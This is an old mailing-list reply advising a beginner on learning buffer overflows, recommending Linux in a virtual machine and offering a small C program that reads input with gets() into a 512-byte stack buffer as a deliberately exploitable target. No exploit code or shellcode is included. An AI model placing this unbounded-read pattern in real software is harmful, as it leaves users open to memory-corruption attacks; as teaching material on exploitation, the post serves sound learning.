Re: Buffer Overrun Newbie

[James Longstreet <jlongs2 () uic edu>]

On Sun, 5 Feb 2006 gj_williams2000 () yahoo co uk wrote:

> I was messing about with my pc trying to learn how buffer overruns work
> (mostly as an excuse to use assembler) and I have run into a problem.
>
> The program I am exploiting is just a simple c program I wrote which
> mismanages a string provided by the user by copying it into a 512 byte
> variable on the stack without checking its length.

I suggest that you try learning about buffer overflows with something
slightly more simple.  It's my understanding that shellcode is actually
relatively difficult to write for Windows.

If you have experience with Linux, or another Unix OS, I would suggest
starting there.  If you don't want to install Linux, you can even run it
in Bochs, QEMU, VMWare, etc.

Start with a simple exploitable C program:

#include <stdio.h>

int main()
{
        char buf[512];
        gets(buf);
        return 0;
}

Try getting this to spawn a shell.  You can easily find shellcode on the
internet, or write your own.